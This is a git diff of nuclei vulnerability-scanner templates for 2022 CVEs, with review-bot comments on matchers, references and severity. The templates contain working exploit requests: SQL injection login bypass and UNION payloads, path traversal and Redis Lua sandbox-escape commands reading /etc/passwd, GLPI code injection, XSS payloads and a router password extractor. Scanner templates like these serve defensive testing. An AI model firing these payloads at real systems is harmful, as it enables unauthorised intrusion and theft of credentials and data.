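Review bot: As shown on this page, the body matcher in CVE-2022-30776.yaml is only `"Error: 1"`. That string would also be present when a fixed instance echoes the `error` value HTML-encoded, so the template can report patched hosts. The body matcher should require the unencoded script element from the request path, so that only an unescaped reflection counts as a hit. The page rendering may have dropped markup from that string, so check the file itself before changing it.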
@@ -1,40 +0,0 @@ -id: CVE-2022-31268 -info: - name: Gitblit 1.9.3 - Path traversal - author: 0x_Akoko - severity: high - description: | - A Path Traversal vulnerability in Gitblit 1.9.3 can lead to reading website files via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname). - reference: - - https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md - - https://www.cvedetails.com/cve/CVE-2022-31268 - - https://vuldb.com/?id.200500 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-31268 - cwe-id: CWE-22 - metadata: - shodan-query: http.html:"Gitblit" - verified: "true" - tags: cve,cve2022,lfi,gitblit -requests: - - method: GET - path: - - "{{BaseURL}}/resources//../WEB-INF/web.xml" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "java.sun.com" - - "gitblit.properties" - condition: and - - type: word - part: header - words: - - "application/xml" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-31373.yaml b/nuclei-templates/CVE-2022/CVE-2022-31373.yaml deleted file mode 100644 index c09b86777f..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-31373.yaml +++ /dev/null 
@@ -1,36 +0,0 @@ -id: CVE-2022-31373 -info: - name: SolarView Compact 6.00 - Cross-Site Scripting(XSS) - author: ritikchaddha - severity: medium - description: | - SolarView Compact v6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component Solar_AiConf.php. - reference: - - https://github.com/badboycxcc/SolarView_Compact_6.0_xss - - https://nvd.nist.gov/vuln/detail/CVE-2022-31373 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-31373 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"SolarView Compact" - verified: "true" - tags: cve,cve2022,xss,solarview -requests: - - method: GET - path: - - '{{BaseURL}}/Solar_AiConf.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - part: body - words: - - '/Solar_AiConf.php/">' - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32015.yaml b/nuclei-templates/CVE-2022/CVE-2022-32015.yaml deleted file mode 100644 index b1faf475d6..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-32015.yaml +++ /dev/null 
@@ -1,29 +0,0 @@ -id: CVE-2022-32015 -info: - name: Complete Online Job Search System v1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Complete Online Job Search System v1.0 is vulnerable to SQL Injection via /eris/index.php?q=category&search=. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-8.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32015 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32015 - cwe-id: CWE-89 - metadata: - verified: "true" - tags: cve,cve2022,sqli,jobsearch -variables: - num: "999999999" -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+" - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' diff --git a/nuclei-templates/CVE-2022/CVE-2022-32022.yaml b/nuclei-templates/CVE-2022/CVE-2022-32022.yaml new file mode 100644 index 0000000000..6face31438 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-32022.yaml 
@@ -0,0 +1,44 @@
+id: CVE-2022-32022
+info:
+ name: Car Rental Management System v1.0 - SQL Injection
+ author: arafatansari
+ severity: high
+ description: |
+ Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/ajax.php?action=login.
+ reference:
+ - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-32022
+ - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2022-32022
+ cwe-id: CWE-89
+ metadata:
+ shodan-query: http.html:"Car Rental Management System"
+ verified: "true"
+ tags: cve,cve2022,carrental,cms,sqli,login-bypass
+requests:
+ - raw:
+ - |
+ POST /admin/ajax.php?action=login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ username=admin'+or+'1'%3D'1'%23&password=admin
+ - |
+ GET /admin/index.php?page=home HTTP/1.1
+ Host: {{Hostname}}
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'Welcome back Administrator!'
+ - 'action=logout'
+ - 'Manage Account'
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2022/CVE-2022-32025.yaml b/nuclei-templates/CVE-2022/CVE-2022-32025.yaml
new file mode 100644
index 0000000000..fb24e14552
--- /dev/null
+++ b/nuclei-templates/CVE-2022/CVE-2022-32025.yaml
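Review bot: The third `reference` entry in CVE-2022-32022.yaml repeats the first with a trailing `.` (`.../SQLi-1.md.`), which gives a dead link and should be dropped. The template confirms the finding by obtaining an administrator session on the scanned host (`cookie-reuse: true`, then `/admin/index.php?page=home`). The `description` only names the endpoint; it should state that, and a tag such as `intrusive` would let operators exclude the template from routine scans. The three body words are also not tied to the second response; with `req-condition: true` the matcher could name `body_2` explicitly.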
@@ -0,0 +1,46 @@
+id: CVE-2022-32025
+info:
+ name: Car Rental Management System v1.0 - SQL Injection
+ author: arafatansari
+ severity: high
+ description: |
+ Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/view_car.php?id=.
+ reference:
+ - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-6.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-32025
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2022-32025
+ cwe-id: CWE-89
+ metadata:
+ comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
+ shodan-query: http.html:"Car Rental Management System"
+ verified: "true"
+ tags: cve,cve2022,carrental,cms,sqli,authenticated
+variables:
+ num: "999999999"
+requests:
+ - raw:
+ - |
+ POST /admin/ajax.php?action=login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ username={{username}}%23&password={{password}}
+ - |
+ GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1
+ Host: {{Hostname}}
+ skip-variables-check: true
+ redirects: true
+ max-redirects: 2
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '{{md5({{num}})}}'
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2022/CVE-2022-32026.yaml b/nuclei-templates/CVE-2022/CVE-2022-32026.yaml
deleted file mode 100644
index 87d30308b6..0000000000
--- a/nuclei-templates/CVE-2022/CVE-2022-32026.yaml
+++ /dev/null
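Review bot: The login body `username={{username}}%23&password={{password}}` in CVE-2022-32025.yaml appends `%23` to the operator-supplied user name, which looks like residue from the string quoted in `metadata.comment`. With real credentials the extra `#` will presumably make the login fail, so the second request runs without a session and the template reports a false negative. The sibling template CVE-2022-32026.yaml, removed in this same commit, sends `username={{username}}&password={{password}}`, and this one should match it. `skip-variables-check: true` also deserves a one-line comment on why it is needed.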
@@ -1,47 +0,0 @@ -id: CVE-2022-32026 -info: - name: Car Rental Management System v1.0 - SQL Injection - author: arafatansari - severity: high - description: | - Car Rental Management System v1.0 is vulnerable to SQL Injection via /admin/manage_user.php?id=. - reference: - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md - - https://nvd.nist.gov/vuln/detail/CVE-2022-32028 - - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-5.md - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-32028 - cwe-id: CWE-89 - metadata: - comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. - shodan-query: http.html:"Car Rental Management System" - verified: "true" - tags: cve,cve2022,carrental,cms,sqli,authenticated -variables: - num: "999999999" -requests: - - raw: - - | - POST /admin/ajax.php?action=login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - | - GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1 - Host: {{Hostname}} - skip-variables-check: true - redirects: true - max-redirects: 2 - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-32409.yaml b/nuclei-templates/CVE-2022/CVE-2022-32409.yaml deleted file mode 100644 index aec3372d91..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-32409.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: CVE-2022-32409 -info: - name: i3geo - Directory Traversal - author: pikpikcu - severity: critical - description: A local file inclusion (LFI) vulnerability in the component codemirror.php of Portal do Software Publico Brasileiro i3geo v7.0.5 allows attackers to execute arbitrary PHP code via a crafted HTTP request - reference: - - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt - - https://nvd.nist.gov/vuln/detail/CVE-2022-32409 - - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-32409 - cwe-id: CWE-94 - metadata: - shodan-query: http.html:"i3geo" - verified: "true" - tags: cve,cve2022,i3geo,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-33119.yaml b/nuclei-templates/CVE-2022/CVE-2022-33119.yaml new file mode 100644 index 0000000000..223c8ed044 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-33119.yaml 
@@ -0,0 +1,35 @@ +id: CVE-2022-33119 +info: + name: NVRsolo v03.06.02 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + NUUO Network Video Recorder NVRsolo v03.06.02 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via login.php. + reference: + - https://github.com/badboycxcc/nuuo-xss/blob/main/README.md + - https://nvd.nist.gov/vuln/detail/CVE-2022-33119 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-33119 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:"NVRsolo" + verified: "true" + tags: cve,cve2022,nvrsolo,xss +requests: + - raw: + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: "><" + + language=en&user=user&pass=pass&submit=Login + matchers: + - type: dsl + dsl: + - 'contains(all_headers, "text/html")' + - 'status_code == 200' + - contains(body,'<\"?cmd=') + condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-34047.yaml b/nuclei-templates/CVE-2022/CVE-2022-34047.yaml deleted file mode 100644 index 4601f6daa5..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-34047.yaml +++ /dev/null 
@@ -1,34 +0,0 @@ -id: CVE-2022-34047 -info: - name: Wavlink Set_safety.shtml - Password Exposure - author: For3stCo1d - severity: high - description: | - An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd]. - reference: - - https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047 - metadata: - verified: true - shodan-query: http.title:"Wi-Fi APP Login" - tags: cve,cve2022,wavlink,router,exposure -requests: - - raw: - - | - GET /set_safety.shtml?r=52300 HTTP/1.1 - Host: {{Hostname}} - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'var syspasswd="' - - 'APP' - condition: and - - type: status - status: - - 200 - extractors: - - type: regex - regex: - - 'syspasswd="(.+?)"' diff --git a/nuclei-templates/CVE-2022/CVE-2022-35416.yaml b/nuclei-templates/CVE-2022/CVE-2022-35416.yaml deleted file mode 100644 index d782414f0d..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-35416.yaml +++ /dev/null 
@@ -1,39 +0,0 @@ -id: CVE-2022-35416 -info: - name: H3C SSL VPN through 2022-07-10 - Cookie Based XSS - author: 0x240x23elu - severity: medium - description: | - H3C SSL VPN through 2022-07-10 allows wnm/login/login.json svpnlang cookie XSS. - reference: - - https://github.com/advisories/GHSA-9x76-78gc-r3m9 - - https://github.com/Docker-droid/H3C_SSL_VPN_XSS - - https://nvd.nist.gov/vuln/detail/CVE-2022-35416 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-35416 - cwe-id: CWE-79 - metadata: - shodan-query: http.html_hash:510586239 - verified: "true" - tags: cve,cve2022,xss,vpn,h3c -requests: - - raw: - - | - GET /wnm/login/login.json HTTP/1.1 - Host: {{Hostname}} - Cookie: svpnlang= - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-35914.yaml b/nuclei-templates/CVE-2022/CVE-2022-35914.yaml deleted file mode 100644 index 00d4ea6869..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-35914.yaml +++ /dev/null 
@@ -1,46 +0,0 @@ -id: CVE-2022-35914 - -info: - name: GLPI - Remote Code Execution - author: For3stCo1d - severity: critical - description: | - /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2 allows PHP code injection. - reference: - - https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914 - - https://github.com/cosad3s/CVE-2022-35914-poc - - https://nvd.nist.gov/vuln/detail/CVE-2022-35914 - - http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-35914 - cwe-id: CWE-74 - metadata: - shodan-query: http.favicon.hash:"-1474875778" - verified: "true" - tags: cve,cve2022,glpi,rce - -variables: - cmd: "cat+/etc/passwd" - -requests: - - raw: - - | - POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Cookie: sid=foo - - sid=foo&hhook=exec&text={{cmd}} - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-36883.yaml b/nuclei-templates/CVE-2022/CVE-2022-36883.yaml deleted file mode 100644 index 2be945f370..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-36883.yaml +++ /dev/null 
@@ -1,27 +0,0 @@ -id: CVE-2022-36883 -info: - name: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. - severity: high - author: c-sh0 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-36883 - - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N - cvss-score: 7.5 - cve-id: CVE-2022-36883 - cwe-id: CWE-862 - tags: cve,cve2022,jenkins,plugin,git,unauth -requests: - - method: GET - path: - - "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - words: - - '{{randstr}}' diff --git a/nuclei-templates/CVE-2022/cve-2022-0165.yaml b/nuclei-templates/CVE-2022/cve-2022-0165.yaml new file mode 100644 index 0000000000..9c67da252a --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0165.yaml 
@@ -0,0 +1,29 @@ +id: CVE-2022-0165 + +info: + name: WordPress Page Builder KingComposer <=2.9.6 - Open Redirect + author: akincibor + severity: high + description: WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users). + reference: + - https://wpscan.com/vulnerability/906d0c31-370e-46b4-af1f-e52fbddd00cb + - https://nvd.nist.gov/vuln/detail/CVE-2022-0165 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2022-0165 + cwe-id: CWE-601 + tags: cve,cve2022,wp-plugin,redirect,wordpress,wp,wpscan + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/cve-2022-0201.yaml b/nuclei-templates/CVE-2022/cve-2022-0201.yaml new file mode 100644 index 0000000000..b69da0b65f --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0201.yaml 
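Review bot: The `classification` block in cve-2022-0165.yaml rates an open redirect (`cwe-id: CWE-601`) at `C:H/I:H/A:H` with `cvss-score: 8.80`, and `severity: high` follows from it. That impact looks out of line with what the description says the bug does, which is redirect the user to an unvalidated `id` value. Check the vector and severity against the NVD entry already listed under `reference`, since consumers of the scan output will rank this finding by those fields.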
@@ -0,0 +1,38 @@ +id: CVE-2022-0201 + +info: + name: WordPress Permalink Manager <2.2.15 - Cross-Site Scripting + author: Akincibor + severity: medium + description: | + WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page. + reference: + - https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4 + - https://plugins.trac.wordpress.org/changeset/2656512 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0201 + cwe-id: CWE-79 + tags: wp-plugin,wpscan,cve,cve2022,xss,wordpress + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'pm_query' + condition: and + + - type: word + part: header + words: + - text/html + +# Enhanced by md on 2022/09/08 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0218.yaml b/nuclei-templates/CVE-2022/cve-2022-0218.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-0218.yaml rename to nuclei-templates/CVE-2022/cve-2022-0218.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-0288.yaml b/nuclei-templates/CVE-2022/cve-2022-0288.yaml deleted file mode 100644 index 16085e702d..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0288.yaml +++ /dev/null 
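Review bot: The matcher list in cve-2022-0201.yaml has no status check: `matchers-condition: and` combines only the body words and the `text/html` header word. The other XSS templates added in this commit (cve-2022-1221, cve-2022-1904, cve-2022-1906, cve-2022-2187) also require a 200. Adding `- type: status` with `status:` and `- 200` keeps a non-200 page that happens to contain `pm_query` from being reported. The first body word also shows as an empty string on this page; if that is what the file holds rather than a rendering loss, it matches every body and should be the string sent in the `p` parameter.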
@@ -1,50 +0,0 @@ -id: CVE-2022-0288 - -info: - name: WordPress Ad Inserter <2.7.10 - Cross-Site Scripting - author: DhiyaneshDK - severity: medium - description: | - WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page. - reference: - - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42 - - https://nvd.nist.gov/vuln/detail/CVE-2022-0288 - remediation: Fixed in version 2.7.12 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0288 - cwe-id: CWE-79 - tags: wordpress,xss,wpscan,cve,cve2022 - -requests: - - method: POST - path: - - "{{BaseURL}}" - - headers: - Content-Type: "application/x-www-form-urlencoded" - - body: | - html_element_selection= - - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "" - - "ad-inserter" - condition: and - - - type: word - part: header - words: - - "text/html" - -# Enhanced by md on 2022/09/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-0422.yaml b/nuclei-templates/CVE-2022/cve-2022-0422.yaml deleted file mode 100644 index 2593d09fd5..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0422.yaml +++ /dev/null 
@@ -1,50 +0,0 @@ -id: CVE-2022-0422 - -info: - name: WordPress White Label CMS <2.2.9 - Cross-Site Scripting - author: random-robbie - severity: medium - description: | - WordPress White Label CMS plugin before 2.2.9 contains a reflected cross-site scripting vulnerability. It does not sanitize and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing. - reference: - - https://wpscan.com/vulnerability/429be4eb-8a6b-4531-9465-9ef0d35c12cc - - https://plugins.trac.wordpress.org/changeset/2672615 - - https://nvd.nist.gov/vuln/detail/CVE-2022-0422 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0422 - cwe-id: CWE-79 - tags: cve,cve2022,wordpress,xss,wp-plugin,wpscan - -requests: - - raw: - - | - POST /wp-login.php?wlcms-action=preview HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "alert(/XSS/);" - - - type: word - part: body - words: - - "wlcms-login-wrapper" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by md on 2022/09/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-0482.yaml b/nuclei-templates/CVE-2022/cve-2022-0482.yaml new file mode 100644 index 0000000000..9e6755261d --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0482.yaml 
@@ -0,0 +1,57 @@ +id: CVE-2022-0482 + +info: + name: Easy!Appointments <1.4.3 - Broken Access Control + author: francescocarlucci,opencirt + severity: critical + description: | + Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments. + reference: + - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/ + - https://github.com/alextselegidis/easyappointments + - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0482 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2022-0482 + cwe-id: CWE-863 + tags: cve,cve2022,easyappointments + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + csrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01 + + extractors: + - type: kval + part: header + name: csrf_token + kval: + - "csrfCookie" + internal: true + + cookie-reuse: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '"appointments":' + - '"unavailables":' + condition: and + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/cve-2022-0540.yaml b/nuclei-templates/CVE-2022/cve-2022-0540.yaml new file mode 100644 index 0000000000..ad50fa4868 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0540.yaml 
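Review bot: The `info` block of cve-2022-0482.yaml has no `remediation` field even though the description names the fixed release; I would add `remediation: Upgrade Easy!Appointments to 1.4.3 or later.` A match means the second response returned the `"appointments":` and `"unavailables":` records, which the description classes as private personal information. A comment above the matchers should say that any stored response from this template has to be handled as personal data.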
@@ -0,0 +1,39 @@ +id: CVE-2022-0540 + +info: + name: Atlassian Jira Seraph - Authentication Bypass + author: DhiyaneshDK + severity: critical + description: | + Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0. + reference: + - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0540 + - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20 + remediation: Ensure you are using the latest version and that all security patches have been applied. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0540 + cwe-id: CWE-287 + metadata: + shodan-query: http.component:"Atlassian Jira" + tags: cve,cve2022,atlassian,jira,exposure,auth-bypass + +requests: + - method: GET + path: + - '{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'General Insight Configuration' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/cve-2022-0543.yaml b/nuclei-templates/CVE-2022/cve-2022-0543.yaml new file mode 100644 index 0000000000..d26e91ee2f --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0543.yaml 
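Review bot: The `remediation` line in cve-2022-0540.yaml is generic (`Ensure you are using the latest version and that all security patches have been applied.`) although the description already lists the fixed releases. Stating them gives an operator something to verify: `remediation: Upgrade Jira Server/Data Center to 8.13.18, 8.20.6, 8.22.0 or later, and Jira Service Management to 4.13.18, 4.20.6, 4.22.0 or later.` The only request is for `InsightPluginShowGeneralConfiguration.jspa`, so the check appears to depend on the Insight app being present. A clean result on an instance without it should not be read as patched, and the description should say so.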
@@ -0,0 +1,39 @@ +id: CVE-2022-0543 + +info: + name: Redis Sandbox Escape - Remote Code Execution + author: dwisiswant0 + severity: critical + description: | + This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The + vulnerability was introduced by Debian and Ubuntu Redis packages that + insufficiently sanitized the Lua environment. The maintainers failed to + disable the package interface, allowing attackers to load arbitrary libraries. + reference: + - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce + - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis + - https://bugs.debian.org/1005787 + - https://www.debian.org/security/2022/dsa-5081 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2022-0543 + metadata: + shodan-query: redis_version + tags: cve,cve2022,network,redis,unauth,rce,kev + +network: + - inputs: + - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n" + + host: + - "{{Hostname}}" + - "{{Host}}:6379" + read-size: 64 + + matchers: + - type: regex + regex: + - "root:.*:0:0:" + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/cve-2022-0653.yaml b/nuclei-templates/CVE-2022/cve-2022-0653.yaml deleted file mode 100644 index 97a429face..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0653.yaml +++ /dev/null 
